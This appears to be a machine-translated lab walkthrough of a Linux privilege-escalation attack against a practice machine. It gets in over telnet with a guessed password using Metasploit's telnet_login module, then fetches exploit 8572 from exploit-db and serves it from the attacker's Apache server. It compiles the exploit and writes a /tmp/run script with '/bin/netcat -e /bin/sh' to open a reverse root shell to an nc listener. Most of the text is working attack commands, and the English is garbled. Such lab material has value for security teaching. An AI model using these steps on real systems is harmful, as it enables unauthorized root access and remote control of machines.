6-9 vulnerability exploitation telnet login rights lifting

After logging in with a weak password , Right to raise

msf Sign in telnet

stay metasploit Use in telnet_login Log in , Use sessions -l View current session , And use sessions -i id Connect shell.

msfconsole
use auxiliary/scanner/telnet/telnet_login
show options
set username Administrator
set password hacker1961
set rhosts 192.168.42.145
run

This is the time , We established a session

sessions -l
sessions -i 1
ipconfig

This is the time , We got one shell, And use shell Login successful

msf Connect shell download exp

Use wget Download

wget http://www.exploit-db.com/download/8572
// Corresponding exp The address of , Download 

I downloaded it locally , Set up corresponding services , Our range machine , adopt wget, Download us kali One of them exp

wget http://www.exploit-db.com/download/8572
ls

There will be errors when we download directly , We can do it in kali Build local http The server , solve

cd /var/www/html
// We switch to the site and directory 
ls
sudo wget http://www.exploit-db.com/download/8572
// We will use this product , download 
ls
mv 8572 test.c
// rename 8572
ls

cat test.c
// Use cat To view the 

service apache2 start
// start-up apache service 

After starting , We can use the corresponding shell, Download the current content

ifconfig

Open the corresponding shell

wget "http://192.168.1.105/test.c"

ls

See the current working directory , There is test.c, We do it this way , You get it exp

Set up kali nc monitor

First use kali nc Make a monitor , Otherwise our rebound shell, Can't get , Because we carry out exp after , Will immediately execute the rebound shell

nc -lvp 4444
//-l Start monitor mode ,-v Detailed analysis content ,-p Listening port 

above , The corresponding monitoring is completed

Compile implementation exp, obtain root

gcc  Source file  -o exploit

echo '#!/bin/sh' > /tmp/run

echo '/bin/netcat -e /bin/sh IP Address  4444' >> /tmp/run

ps -edf | grep udev

 perform exploit  have root The powers of the pid -1
./exploit  Numbers pid -1

First, we need to download the file just now , Compile , Compile to executable binary , Compile to exploit among

gcc test.c -o exploit

At this time, there is a corresponding error , This is because after we download , In the code , There is no last line

We put test.c Delete , Download again

rm test.c

We open a terminal

gedit /var/www/html/test.c

Delete the last line , Next , Let's download again

wget "http://192.168.1.105/test.c"
ls
rm exploit
gcc test.c -o exploit

This is the time , We successfully compiled exp

ls -alh

We found that exp The permissions that can be executed include read-write execution , We can use exp rebound shell

echo '#!/bin/sh' > /tmp/run

echo '/bin/netcat -e /bin/sh kali Of IP Address  4444' >> /tmp/run
//kali Of IP Address 
cat /tmp/run

ps aux | grep udev
// View the current in progress including udev The content of 

We found that with root Permission running process , Its process id yes 2698

./exploit 2697

This is the time , Monitoring completed , I went back to the monitor to check

We found the listening port , Immediately returned to the corresponding id What to do , You will see that it is root jurisdiction

whoami

We see this time , The return is root jurisdiction , Do it here , We have finished the part of the experiment

We downloaded exp There are some explanations , First , We need to find one udev The content of , its pid subtract 1, Pass as a parameter , After the compilation ,exploit Will perform tmp/run The contents of the document , As a root jurisdiction , Regardless of our payload What is the , All return one root jurisdiction , This is the time , We can do that root Among the permissions , Write something , Return a rebound ncshell, Back to ncshell Yes. root The powers of the , This is also a description of our overall usage